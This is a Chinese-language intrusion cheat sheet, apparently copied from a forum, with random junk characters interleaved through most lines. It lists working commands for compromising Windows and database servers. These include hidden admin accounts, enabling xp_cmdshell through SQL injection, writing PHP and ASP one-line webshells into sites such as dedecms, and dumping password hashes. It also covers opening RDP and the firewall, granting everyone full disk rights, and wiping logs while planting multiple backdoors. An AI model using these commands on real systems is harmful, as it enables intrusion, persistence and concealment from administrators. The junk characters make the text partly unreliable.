) O% }. z \) o# I+ C
1.net user administrator /passwordreq:no
3 b# P) Q% k: x这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
/ W! }+ z7 a0 |2.比较巧妙的建克隆号的步骤8 |- r5 {; f0 D8 X L
先建一个user的用户
7 N7 [. w* Y8 C$ d然后导出注册表。然后在计算机管理里删掉8 l/ P3 {; z* p% g$ T
在导入,在添加为管理员组1 @$ Z/ O V7 }4 Q. J
3.查radmin密码. Q6 s2 ^) g" [
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
4 T$ [3 y" h$ ~5 \ r) v4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
2 S8 L4 { a6 y2 M& W% }建立一个"services.exe"的项
+ h" V6 G1 G: \- S5 ~6 c% @再在其下面建立(字符串值) E9 j2 d( `$ ^6 K& K3 R: A
键值为mu ma的全路径
7 w7 @. f7 I0 E9 J+ o5.runas /user:guest cmd% n7 R6 X' }( M. X0 ~. P+ Y: W8 o
测试用户权限!9 u+ C8 I8 r, i
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
2 S; K* Y1 Q, [& j* w7.入侵后漏洞修补、痕迹清理,后门置放:
) L" L* Z0 i& L% E0 N6 e基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
8 T$ P0 o% S5 ~% k! |. Z8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
/ Y ~* \" _& J) e# c2 `/ P6 T4 l5 L# n7 ^8 o
for example
5 S6 d8 J5 i; Q3 C% M6 y. E/ }, k8 s
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'- X; q& q: S( v! {0 ?3 r
4 m$ s* X% c% a1 cdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'3 p. J+ \. x p- y* ~) T& r
0 z& x* w' v/ C" |! Q) W& \9:MSSQL SERVER 2005默认把xpcmdshell 给ON了' u4 E( q1 X2 k6 [' G; M" X
如果要启用的话就必须把他加到高级用户模式' E+ T: E3 u: c$ Y3 L5 N
可以直接在注入点那里直接注入) `3 ~, I3 j) O# j! L
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
9 y! \" I: v% U% V6 e* E然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
# L% q- [3 l; U4 B9 i' w* q或者7 k+ k% g) Y" ]2 F0 P; b
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'# J U* _! ^* E( s5 m
来恢复cmdshell。* ^& V/ q) x2 P0 K0 k, o+ n, V
7 Q h( @7 ^+ h! @' g
分析器4 l+ D2 F: m9 h) @
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--, F: ]2 O' q+ \1 W r
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
* W4 K! z. Q0 T2 o) E3 N10.xp_cmdshell新的恢复办法
3 b% M' D, m3 e8 w* |6 Uxp_cmdshell新的恢复办法
/ b$ Q |7 p1 o, R2 ^- O扩展储存过程被删除以后可以有很简单的办法恢复:+ ~! E/ N4 r; j6 p7 t+ Q: V
删除8 c) P! W+ @: H1 A+ j4 o
drop procedure sp_addextendedproc( y7 w2 S# f5 M7 B
drop procedure sp_oacreate
& O1 h; w! K4 O9 i9 |exec sp_dropextendedproc 'xp_cmdshell'$ @4 y: Z0 [4 g1 Q7 I. A, o# [
' M3 m; ~) R7 j7 I5 J: r) @恢复: u% e, L p& L1 @5 [" I4 q' w& u" }/ s
dbcc addextendedproc ("sp_oacreate","odsole70.dll")% s; R" L( E0 x/ Y, q3 ?/ B6 d
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
( V3 C- h$ ?) \5 y, b/ b9 a( d( i0 E9 C
这样可以直接恢复,不用去管sp_addextendedproc是不是存在% [1 k1 u! D5 P9 ~, o" I
7 j/ Z D8 T- L$ c* O! [+ a8 N7 O2 U-----------------------------
0 E% ^- R1 _& P- N+ ]$ Q$ y& g/ J6 k( _" l. o& k
删除扩展存储过过程xp_cmdshell的语句:
) d: Z n) a* Y9 {exec sp_dropextendedproc 'xp_cmdshell'( T! B' j& j$ r6 l x( ^' C& }
1 s7 Y$ o0 t% K% {! B; m恢复cmdshell的sql语句, v- |0 K* A( V
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'6 `% y( c& ?7 p6 O- Q' L# J
, m4 v8 B( H2 E/ U$ R$ l( \, K% j% E( e+ A
开启cmdshell的sql语句
) R- A3 Q* t# {) g* m$ r# O, w$ g& v4 Q& Q& i( k
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'8 ]; u* I% b" ?/ V4 h# T! \6 G
. M: P$ o r' @2 G判断存储扩展是否存在/ {8 w/ [" x( Y, {1 E1 T
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'& R% p& p( p j) G0 i
返回结果为1就ok7 _2 h, u4 J3 ], P8 n
, T. U! Z1 \1 ~* O) H$ a
恢复xp_cmdshell2 r& P% L# j2 _: b' |' d
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
) C1 H! I7 v$ ^& S/ F返回结果为1就ok
5 Q5 J/ P! X" U3 L! x! Z( l9 c, V% o" I
5 F6 ^8 _9 o i& I否则上传xplog7.0.dll
' I' w. e2 Y" D' q9 t9 o/ e/ b, F% jexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
, i( a' E, f% G
* i+ l* X# P5 D( Z, b堵上cmdshell的sql语句
, Z6 `1 }- g# c# _4 S. Ysp_dropextendedproc "xp_cmdshel
% Y5 f1 @& C! e5 B: s-------------------------5 j, K- T$ W. D( H6 N n; s9 `
清除3389的登录记录用一条系统自带的命令:9 B( ?6 f+ }7 S1 ^8 s3 @0 Y
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f6 a; M; K( ]+ g$ b1 C) Y0 ]
! G& K( [2 V0 w
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件, B& ?: s$ v: F. z* c% N5 o7 t& l1 H
在 mysql里查看当前用户的权限 o. O- b7 z, _5 _+ B
show grants for
# p' a5 a' w" J5 q7 F# j! J6 G+ Q6 G5 V# R# q" }
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
; a4 e$ T, I/ y1 |4 M$ a. Q( H: @( O" |* r, v. q" n/ j/ |) v
9 t& Z: Z$ R7 v( \) G, c) MCreate USER 'itpro'@'%' IDENTIFIED BY '123';
, l: m" `0 w, D0 P3 ?1 ], d; M: j5 V$ @4 s8 H9 q8 M
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
* ^/ ?0 H& m3 m1 z8 r; V
. k1 U$ Z& L6 zMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
h* f! K/ b2 O9 d( o7 R
7 k$ n, q9 u: R0 D3 aMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
7 w, ]$ l" @: B* ]0 I7 J+ u2 {! e
, V4 b! \1 x8 f4 t搞完事记得删除脚印哟。
G9 z. Y+ u) q; N0 G2 A, L( n. J* U
% _5 K! k6 U8 f8 f6 x8 eDrop USER 'itpro'@'%';$ \; i. N3 {4 b+ P
! W4 z* j; Z+ r8 m2 H
Drop DATABASE IF EXISTS `itpro` ;
6 X f! ~( N1 v" {& l3 x2 `
* h* [/ Y$ x3 p: ?) [9 a5 f+ J当前用户获取system权限# ]; m9 c0 m- Z' Y
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact, S. \7 r7 ?& Q+ K1 m- U
sc start SuperCMD
6 l$ p4 n- V4 Y程序代码
/ _0 o( O# S/ E6 L/ E3 ~9 p<SCRIPT LANGUAGE="VBScript">% S; F5 x V6 V
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
6 |8 _8 ~* g" ?, C2 b6 t4 vos="WinNT://"&wsnetwork.ComputerName
( G+ e+ H4 z2 iSet ob=GetObject(os)
( K8 Q! ^6 l- YSet oe=GetObject(os&"/Administrators,group")
$ K" q) V7 c1 E! _5 s5 HSet od=ob.Create("user","nosec")
/ ]6 E% [8 F" ^+ X/ `od.SetPassword "123456abc!@#"
6 P. O7 o6 [5 ]8 P# l8 Qod.SetInfo
: R* ?( ]# w. l/ ^( w O% mSet of=GetObject(os&"/nosec",user)! {. Z* B' r' N( h. l! A3 ^
oe.add os&"/nosec"
) b) v2 O' m! n5 N# b: T</Script>/ V$ |& l" ^( B# r$ u P2 q! d
<script language=javascript>window.close();</script>: W' v- l, c9 O4 Q) E) K2 Z! V
1 m* c1 u$ J1 C4 b, K9 L- q4 O6 V# F9 W' j
6 S' R; Y5 D5 Z* G
2 s8 b% V5 e6 d) C
突破验证码限制入后台拿shell/ r, @ J- ~/ n: {8 J
程序代码
5 \2 n0 t& W5 K! n8 c7 {REGEDIT4 . f/ _. c. }) b, O# J8 m
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] $ m. N( Z+ q( R# `2 `1 c" u) C
"BlockXBM"=dword:00000000
; F1 M4 M9 ?* n8 h
$ T% u& ^6 Y" {: ]4 _3 k7 P, b保存为code.reg,导入注册表,重器IE
4 ^) q% s# {& V- Z1 _* a- [就可以了
" c1 [0 C9 e- G% o+ @( Ounion写马
% P8 P) E8 Q5 ~6 a/ L9 i程序代码* p% K) C' O2 p4 S3 B* a$ I
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
: q# U7 `- m% s3 ]9 w; g% m! Q1 Z% \9 _* S7 [2 @) j& |
应用在dedecms注射漏洞上,无后台写马% O- l* g4 I H
dedecms后台,无文件管理器,没有outfile权限的时候. S3 y5 O# d7 d7 r: E. W
在插件管理-病毒扫描里
( `8 c6 m1 Z; I5 h' L; _$ |写一句话进include/config_hand.php里
! w5 P' I0 q& t/ q# l7 d程序代码
" t/ |/ j; t, ?/ c# b' z5 `# O: \>';?><?php @eval($_POST[cmd]);?>
% D/ n) R# |4 S; E+ I; ^7 [4 K/ O Z& r3 r% ^, C3 |
~! Q& }* c' Y9 m6 q$ F
如上格式- j; A# Q9 H$ b6 P3 L
/ e* [& Z( f& ooracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
3 n. R4 z+ N6 r4 M! w程序代码& G0 A- ^5 h4 Q) A$ O
select username,password from dba_users;: m6 D. |6 i9 p5 [! c
, _4 e+ g- v& y4 u' _. s
6 s" Y7 Z6 e {* D2 D5 xmysql远程连接用户# U4 {! J' A7 v2 |' k! m% s
程序代码
" ^1 L0 s5 w9 W. I7 B) l/ J/ \: e$ ^; d. k9 Q8 d- z, j0 }
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';, F" Q# A {& y/ T) I/ L
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
# ^; ^# q4 H+ zMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
+ h4 s+ h8 t9 h$ ?: R2 o( \MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
/ g4 {. {5 f' K$ [( p) ~6 W9 N4 ~3 X& q
5 Q, S& ~* a8 T/ P& O
, c% O3 |( \0 W
1 y+ N; S& ?0 _, J) _, K: kecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0; D% ^6 h. X8 j
8 }9 g3 H) J, M: r5 C
1.查询终端端口
. A( _* R3 D! S( Q3 x7 L4 J2 z
- W/ Y9 o2 _3 }8 W9 C# u; hxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber* _2 e/ f v6 F) P
# a. ~& o5 y% f; o5 J. W, P k通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
" t0 Q; J6 |6 _2 H5 d+ A4 otype tsp.reg
! ?* Y4 {3 X# I$ b: e6 j' j( V7 T" P7 r, w
2.开启XP&2003终端服务
( `( o- K& o* ]8 b$ ]9 q* A. J3 g( y
1 f( z+ h3 m/ t" g( [% d
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f% M5 Z- B" F, I
7 _3 C, v/ Q8 M7 `3 s8 W9 y& _) K- m$ F& I/ y
2 m" G4 Z! s+ P2 qREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f% _; e) T- @8 S4 F% k
2 Z- Q$ q( r+ V& O; j Z8 U3.更改终端端口为20008(0x4E28)
% M# K0 S& G/ k' S% `+ j; H5 j: m3 }, ?
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
4 ^" y- S" }# Q* V% W: l1 u- R3 K# z0 U! c# o" u2 K* I% \4 J
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f" Y5 \* N7 S }7 C* R3 y1 `& ~
! ^7 G. ^' p6 \8 E5 R
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制3 [- ]1 |, Q, ?& [1 L1 X& `) L
. ]* E6 p3 [! G! A
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
" k" `: ]8 \% t: W* J
5 U3 c$ E2 m" q/ ?4 b5 }) i
. n5 Y+ F" ?* C5.开启Win2000的终端,端口为3389(需重启)' |& a. p4 K( n6 H
9 [! g0 k$ I0 K5 U, e
echo Windows Registry Editor Version 5.00 >2000.reg
) N& c: `# n& e# A# ^ [- uecho. >>2000.reg" |+ c9 ^4 D* h7 K" r
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
3 Q# |5 B$ i7 x$ F% C7 l1 F* Secho "Enabled"="0" >>2000.reg
a# d8 {3 i. e6 Hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
; i* z0 l" b: cecho "ShutdownWithoutLogon"="0" >>2000.reg + \( K- P( k/ a( | n# S
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
' i4 P3 ?, T; x; _echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg ; [& J2 k( A- L) d6 s5 n) `9 f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
+ F; L$ S8 w! {% R! }' v+ p3 qecho "TSEnabled"=dword:00000001 >>2000.reg
* y( _! p0 @- kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
( `! w& c# x7 \) O. Yecho "Start"=dword:00000002 >>2000.reg
% f5 ` Y5 \; E2 Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
& \5 U$ a2 U3 p! Recho "Start"=dword:00000002 >>2000.reg
( N, {5 s$ J* @- zecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg - W6 j( _9 b' i
echo "Hotkey"="1" >>2000.reg 6 @8 y1 x- }7 `$ ~3 o" N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg 1 w; \. u' D9 [: T0 I V3 A5 t# O
echo "ortNumber"=dword:00000D3D >>2000.reg 9 f% ]5 }7 I) o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
0 ~8 d% Q2 o0 a* m) C Q# zecho "ortNumber"=dword:00000D3D >>2000.reg
; q; ^1 c/ D9 l
7 M; f" L+ J, z% @3 q# W3 k. }7 O6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)* D3 q- I# a1 Q, J
7 l, c* @" ^$ \. z@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
: z6 C% F- T _2 L8 [* p(set inf=InstallHinfSection DefaultInstall)
: e+ r0 I$ g0 E4 X; V. R0 K5 b4 R" X% xecho signature=$chicago$ >> restart.inf
& m1 C. L5 D* V, \" `1 C* yecho [defaultinstall] >> restart.inf
8 `$ F, ^5 e) v2 I# W; p7 `, [' wrundll32 setupapi,%inf% 1 %temp%\restart.inf# [$ A$ a0 Q: a0 y2 ^( G
. R( q( g) W% p6 k& F
4 R% H& V; w' s' {& D( g. e( z7.禁用TCP/IP端口筛选 (需重启)
6 z0 K/ j5 ^( w- V6 _+ w
! y4 o. z9 e; ]. f8 aREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
" [$ y, p* `. o# Q; r$ a0 N5 @
& T5 S4 F- C% o7 k8.终端超出最大连接数时可用下面的命令来连接/ B S5 o. ~# S d1 V7 w
9 S$ L2 `: m# ^' t2 N! m# umstsc /v:ip:3389 /console; Y. Q- w# {# w
5 u9 T' J/ _; Z: Q2 s2 }% N" J/ U
9.调整NTFS分区权限
& }: h0 g$ ^1 r9 l8 P9 `0 Y+ p) d+ ~( G* z$ B% s
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
) a( w& h8 s+ ?4 ~$ `' B: w# n
1 ]0 A1 U/ g4 j7 ?7 [6 z5 P+ Ucacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
. l* I) t& R9 i3 Q
7 ~$ A% v8 H8 C8 ]------------------------------------------------------
9 ]! Z) p4 Y! l" }1 o, i2 i3389.vbs 0 ^4 w( [, A! f' F6 V% r+ B' z% ?
On Error Resume Next8 ~4 W* i q ?' Y. \
const HKEY_LOCAL_MACHINE = &H80000002# O, E; p: O" H D4 o# M) g
strComputer = "."
' Y y0 h5 A8 d/ |% jSet StdOut = WScript.StdOut
3 j3 a1 d& f( E1 S5 n& R, G oSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_! \; B5 J) O2 O8 o
strComputer & "\root\default:StdRegProv")
* n, W: V4 p1 y! U5 i8 e9 ^, U$ k& |strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
* F; |% h: X2 _ O; E4 Yoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
/ X0 A- d I }% @ \strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"8 k1 C/ B, Y8 K) }% c
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath+ P. C, `8 T/ E5 o
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"( V+ `# G+ Q/ T! H, b1 a; q* ]
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"1 Z* v) L& O; U
strValueName = "fDenyTSConnections"
7 E) z4 B7 N) r* O9 Y% N* ^dwValue = 0 {, z( E& Y' y+ F. a8 F
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue% L: b. T# h* t& Z& O
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"( Z0 a+ z0 d _; |5 Z/ ^+ e
strValueName = "ortNumber": f: P2 _. T4 R5 W6 i+ z
dwValue = 3389
$ o- x! }) Y' F5 qoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
) q- p, g* y6 {( Q3 S0 OstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
3 m( V' T2 E, v" X7 KstrValueName = "ortNumber"
5 S% Y: ^" g8 d ^7 ~dwValue = 3389
. l2 @: d" R1 Z L) T1 C, x! loreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue0 Y( P" Y6 b, d
Set R = CreateObject("WScript.Shell")
' Y# c5 b* c1 H9 nR.run("Shutdown.exe -f -r -t 0") 8 q8 z7 Y! q9 G- p
, {& L& V/ a% _- U删除awgina.dll的注册表键值6 o0 t8 T) H% `; Z, r2 ^3 a
程序代码
; E' F* \+ y$ j/ k2 H% ~# w* Q" P5 j8 U4 i
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f; V' _2 Z8 n# S& Q/ ?& T
& w n3 a7 e8 s E9 o8 y) x1 E- g+ }- d: t5 R# H
% X7 m0 \* M* k) u4 e: ~9 v
& K1 ]' B' S' `( _( ]( ~
程序代码( S5 K5 U" Z% ?$ ^; m: `
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash: s. R4 L! _$ P
6 t( T" H/ y9 ?9 D$ _+ J设置为1,关闭LM Hash
! Z9 m! w& e. a2 D5 l0 B
: ^; I1 G6 Q+ D, `2 e, G' @数据库安全:入侵Oracle数据库常用操作命令4 o5 N/ X) G/ `% @4 Q6 M& J6 f
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。9 S9 f! }# @7 M" @; w
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
: {0 a" ]0 G; Q8 a5 W* }5 n2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
4 o& T* {0 x) w7 }& j9 {4 k4 y4 D7 \3、SQL>connect / as sysdba ;(as sysoper)或
4 n$ r- @' E D# J) T' s* ^. Fconnect internal/oracle AS SYSDBA ;(scott/tiger)
6 ^6 i8 f6 A9 s5 v, Sconn sys/change_on_install as sysdba;3 U! m/ D4 H; m2 w$ d/ G
4、SQL>startup; 启动数据库实例
) y4 A6 ^3 H# d) ?; ]$ z$ n- d1 D5、查看当前的所有数据库: select * from v$database;" l `) G1 h2 w. i+ F
select name from v$database;
5 I7 k6 ~4 ?; Q; ]3 r& c7 M! s5 m E6、desc v$databases; 查看数据库结构字段
9 t8 x# W q6 U+ E8 {9 ~/ V7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:. v" i) i, b' D- G) I l$ n
SQL>select * from V_$PWFILE_USERS;: O/ b7 g. x7 J4 A6 U$ x8 L
Show user;查看当前数据库连接用户
0 v& m7 _9 }, J( ]/ m+ `8、进入test数据库:database test;6 L* d* F! j5 l1 H
9、查看所有的数据库实例:select * from v$instance;
- r8 V( u; ~" [* n" L/ M5 H/ }如:ora9i/ |/ m T. f6 s: d- h
10、查看当前库的所有数据表:
( k& w# H# l. s- y @, qSQL> select TABLE_NAME from all_tables;+ G4 c% l/ N# u) M
select * from all_tables;
" P: S) {" |# \& `% q# aSQL> select table_name from all_tables where table_name like '%u%';0 ^ O" }. b' E" T& Y0 N5 U4 [
TABLE_NAME/ }1 Y) u0 x( l$ P$ [
------------------------------2 C0 G6 B, b$ Z! ~* E
_default_auditing_options_0 k% y7 x) ]6 ]3 y# ?4 w
11、查看表结构:desc all_tables;
0 \4 m4 \3 N+ C/ x2 S12、显示CQI.T_BBS_XUSER的所有字段结构:
$ W5 }" ]% k$ E7 a+ R& Odesc CQI.T_BBS_XUSER;
$ G6 I4 |3 x/ K1 J; M13、获得CQI.T_BBS_XUSER表中的记录:3 \/ ? s% |8 u% K' b8 q
select * from CQI.T_BBS_XUSER;
, i8 G# ?$ t# _/ l# T14、增加数据库用户:(test11/test)
2 e8 S& Y; j2 r# M: w* v& T) wcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;9 x* m/ A; Z8 V9 L5 e
15、用户授权:' x& K8 |2 T; G* I: e4 C4 Q
grant connect,resource,dba to test11;
. h% x, B7 f v5 V% r, Z$ Sgrant sysdba to test11;9 U1 W0 |! I8 I4 q: }" W) L
commit;& O% u) s0 |. j" D" z9 c
16、更改数据库用户的密码:(将sys与system的密码改为test.)- M5 v% X7 x+ d9 N6 {0 F
alter user sys indentified by test;$ `5 A8 L6 g: e( D; ?& l
alter user system indentified by test;
8 K. o6 Y$ k3 ?) ^6 Z2 O R* z, V# {- {% s: S; {) `6 j
applicationContext-util.xml4 R1 f3 S! D* k4 w% ]
applicationContext.xml
$ K+ X7 e2 Y: d9 sstruts-config.xml& g2 O) [" R) a9 w
web.xml n% Y% q. o! C+ j' H
server.xml
, d9 ?' [+ i- p$ Wtomcat-users.xml
0 M# X) ^9 `* s' C N6 u) Whibernate.cfg.xml
% m! g* a7 r$ X) B; Z) Q- O8 tdatabase_pool_config.xml
* R3 Q1 _' x U$ e- G
0 D T2 O5 j. P7 Y3 @! o( n2 H2 \
% H; S+ L, L, ~3 \. L\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置/ A' v$ l# X% ]. d' J2 U
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini: T# K' N: ?: N# ^; r
\WEB-INF\struts-config.xml 文件目录结构( o$ G, E+ X7 K' O# _) v0 v3 `( V. _" O
/ V" |+ y7 H1 ~0 [spring.properties 里边包含hibernate.cfg.xml的名称
* F1 ^0 p# h/ t6 L+ @$ @2 O4 X- |5 R; C# Z2 X
; a. A# C3 M; c% k. r8 T7 y
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml4 v+ A6 E7 {- f! a
4 O, F; Q O2 F: E, X( I
如果都找不到 那就看看class文件吧。。
, f- n# p5 f) w, v; h2 k M, u# A; Y5 ~* b: Z. L" R. Q
测试1:
% t( q* `) _4 E; A; Z- {SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t12 g' I8 j" A/ g! Z; U
: ?( O1 ?0 S+ P; i: e测试2: r5 E4 W- w/ j& g% J: N
9 E8 z& |8 y' i2 B* p( Zcreate table dirs(paths varchar(100),paths1 varchar(100), id int)7 Z# |/ w' D" x% X/ z
; _, n+ G) L4 c2 M7 f% ~delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
' o. K8 s+ c- s. ~. A3 A
; d4 e- c6 `2 ?* a2 a4 d) PSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
6 a5 ^7 r7 k9 o. Z
6 l0 D5 ^" `0 O: }$ h# K查看虚拟机中的共享文件:3 }! |2 ]4 L% n6 k3 h0 A4 C$ v
在虚拟机中的cmd中执行
8 d/ k) f3 S0 C% j& D4 f\\.host\Shared Folders5 f& | e* C/ O) A
- T' E& p. I: @5 y ^, |6 X2 [
cmdshell下找终端的技巧
& b* g3 i6 [9 D! i找终端:
/ J2 y3 B0 { E6 }第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
6 K% d8 k; d5 Z( M L 而终端所对应的服务名为:TermService , u ~% ?/ n+ c& D- [; j
第二步:用netstat -ano命令,列出所有端口对应的PID值! : W0 ]" d! b7 C0 E% ^! v. B
找到PID值所对应的端口
' O: ~) w6 b9 J& J7 E$ {' W. v- g; o& t- F+ x
查询sql server 2005中的密码hash+ } r. Y, u' Y2 b; o! W+ H3 g7 k
SELECT password_hash FROM sys.sql_logins where name='sa'+ O% ~! Z3 J4 ?. W
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
8 A; M" ^; B6 D% {/ y, Faccess中导出shell
